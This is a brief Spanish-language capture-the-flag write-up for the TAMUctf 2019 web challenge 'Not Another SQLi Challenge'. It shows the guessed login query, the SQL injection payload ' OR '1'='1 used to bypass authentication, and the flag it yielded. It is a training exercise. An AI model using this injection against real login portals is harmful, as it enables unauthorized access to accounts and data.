Files
ctf/2019/tamu/nasc.md
T
2019-03-05 10:55:24 -06:00

35 lines
720 B
Markdown

# Not Another SQLi Challenge
(web 100)
[http://web1.tamuctf.com](http://web1.tamuctf.com)
---
## Desarrollo
Para este problema se realizó una inyección SQL a un portal de login, se
supuso que la consulta a la base de datos era de las más comunmente empleada,
y que de igual forma no se realizaba ningún filtrado de caracteres especiales:
```sql
SELECT * FROM usr WHERE usuario='$usr' AND contrasena='$pswd'
```
Bastaba con formular una oración como la siguiente:
```sql
SELECT * FROM usr WHERE usuario='u' AND contrasena='' OR '1' = '1'%%
```
Se llenaron los campos de la siguiente manera:
Usuario: `root`
Paswwrod: `' OR '1'='1`
Así se obtuvo la flag:
```
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}!
```